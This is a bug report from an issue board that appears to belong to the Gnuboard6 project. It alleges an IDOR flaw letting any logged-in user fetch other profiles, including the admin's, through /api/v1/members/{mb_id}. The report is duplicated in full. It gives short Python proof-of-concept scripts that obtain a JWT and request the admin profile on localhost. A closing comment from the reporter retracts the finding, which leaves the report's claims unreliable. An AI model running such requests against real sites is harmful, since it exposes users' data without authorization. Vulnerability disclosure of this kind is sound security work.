## Summary
An **IDOR (Insecure Direct Object Reference)** vulnerability exists in the endpoint `/api/v1/members/{mb_id}` which allows **any authenticated user** to retrieve **arbitrary user profile information**, including administrator accounts, by simply modifying the `mb_id` path parameter.
This constitutes a serious **vertical privilege escalation (CWE-269, CWE-284)** and **sensitive information disclosure (CWE-200)**.
## Step-by-Step Reproduction (PoC)
### 1. Register and log in as a regular user to obtain JWT access token
```python
import requests
url = "http://localhost:8000/api/v1/token"
credentials = {
"username": "test", # username
"password": "1234"
}
res = requests.post(url, data=credentials)
if res.status_code == 200:
token_data = res.json()
access_token = token_data.get("access_token")
refresh_token = token_data.get("refresh_token")
print("[+] Access Token:", access_token)
print("[+] Refresh Token:", refresh_token)
else:
print(f"[!] 로그인 실패: {res.status_code}")
print(res.text)
```
### 2. Use that regular user's token to access admin profile
```python
import requests
access_token = "<access token from step 1>"
target_mb_id = "admin"
url = f"http://localhost:8000/api/v1/members/{target_mb_id}"
headers = {
"Authorization": f"Bearer {access_token}"
}
res = requests.get(url, headers=headers)
print(f"[+] Status: {res.status_code}")
print(res.text)
```
### Vulnerable Response:
```json
{"mb_id":"admin","mb_nick":"최고관리자","mb_email":"admin@your-domain.com","mb_point":100,"mb_profile":"","mb_icon_path":"/static/img/no_profile.gif","mb_image_path":"/static/img/no_profile.gif","mb_1":"","mb_2":"","mb_3":"","mb_4":"","mb_5":"","mb_6":"","mb_7":"","mb_8":"","mb_9":"","mb_10":""}
```
## Impact
* Any authenticated user can access **any other user's profile**, including admin.
* Disclosed data includes **email, nickname, points**, and potentially more.
* Reflects **improper access control** and **vertical privilege escalation**.
## CWE References
* **CWE-269**: Improper Privilege Management
* **CWE-284**: Improper Access Control
* **CWE-200**: Exposure of Sensitive Information to an Unauthorized Actor
An **IDOR (Insecure Direct Object Reference)** vulnerability exists in the endpoint `/api/v1/members/{mb_id}` which allows **any authenticated user** to retrieve **arbitrary user profile information**, including administrator accounts, by simply modifying the `mb_id` path parameter.
This constitutes a serious **vertical privilege escalation (CWE-269, CWE-284)** and **sensitive information disclosure (CWE-200)**.
## Step-by-Step Reproduction (PoC)
### 1. Register and log in as a regular user to obtain JWT access token
```python
import requests
url = "http://localhost:8000/api/v1/token"
credentials = {
"username": "test", # username
"password": "1234"
}
res = requests.post(url, data=credentials)
if res.status_code == 200:
token_data = res.json()
access_token = token_data.get("access_token")
refresh_token = token_data.get("refresh_token")
print("[+] Access Token:", access_token)
print("[+] Refresh Token:", refresh_token)
else:
print(f"[!] 로그인 실패: {res.status_code}")
print(res.text)
```
### 2. Use that regular user's token to access admin profile
```python
import requests
access_token = "<access token from step 1>"
target_mb_id = "admin"
url = f"http://localhost:8000/api/v1/members/{target_mb_id}"
headers = {
"Authorization": f"Bearer {access_token}"
}
res = requests.get(url, headers=headers)
print(f"[+] Status: {res.status_code}")
print(res.text)
```
### Vulnerable Response:
```json
{"mb_id":"admin","mb_nick":"최고관리자","mb_email":"admin@your-domain.com","mb_point":100,"mb_profile":"","mb_icon_path":"/static/img/no_profile.gif","mb_image_path":"/static/img/no_profile.gif","mb_1":"","mb_2":"","mb_3":"","mb_4":"","mb_5":"","mb_6":"","mb_7":"","mb_8":"","mb_9":"","mb_10":""}
```
## Impact
* Any authenticated user can access **any other user's profile**, including admin.
* Disclosed data includes **email, nickname, points**, and potentially more.
* Reflects **improper access control** and **vertical privilege escalation**.
## CWE References
* **CWE-269**: Improper Privilege Management
* **CWE-284**: Improper Access Control
* **CWE-200**: Exposure of Sensitive Information to an Unauthorized Actor
댓글 1개
oxqnd
4개월 전
I reported this issue without checking the mb_open (profile visibility) setting for the account.
I apologize for the confusion, and I will close this issue.
I apologize for the confusion, and I will close this issue.
게시판 목록
그누보드6 이슈
좋은 댓글과 좋아요는 제작자에게 큰힘이 됩니다.
| 번호 | 제목 | 글쓴이 | 날짜 | 조회 |
|---|---|---|---|---|
| 54 |
supwayb
|
1년 전 | 203 | |
| 53 |
kagla
|
1년 전 | 233 | |
| 52 |
ej31
|
1년 전 | 166 | |
| 51 |
LeeJongwoo3
|
1년 전 | 503 | |
| 50 |
tlsdlftn79
|
1년 전 | 342 | |
| 49 |
Iboy194
|
1년 전 | 230 | |
| 48 |
supwayb
|
1년 전 | 288 | |
| 47 |
kagla
|
1년 전 | 204 | |
| 46 |
supwayb
|
1년 전 | 201 | |
| 45 |
kisa002
|
1년 전 | 261 | |
| 44 |
supwayb
|
1년 전 | 284 | |
| 43 |
kisa002
|
1년 전 | 207 | |
| 42 |
supwayb
|
1년 전 | 216 | |
| 41 |
kisa002
|
1년 전 | 197 | |
| 40 |
mirusu400
|
1년 전 | 177 | |
| 39 |
supwayb
|
1년 전 | 247 | |
| 38 |
mirusu400
|
1년 전 | 304 | |
| 37 |
mirusu400
|
1년 전 | 305 | |
| 36 |
seiblog-nandsoft
|
1년 전 | 157 | |
| 35 |
seiblog-nandsoft
|
1년 전 | 143 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기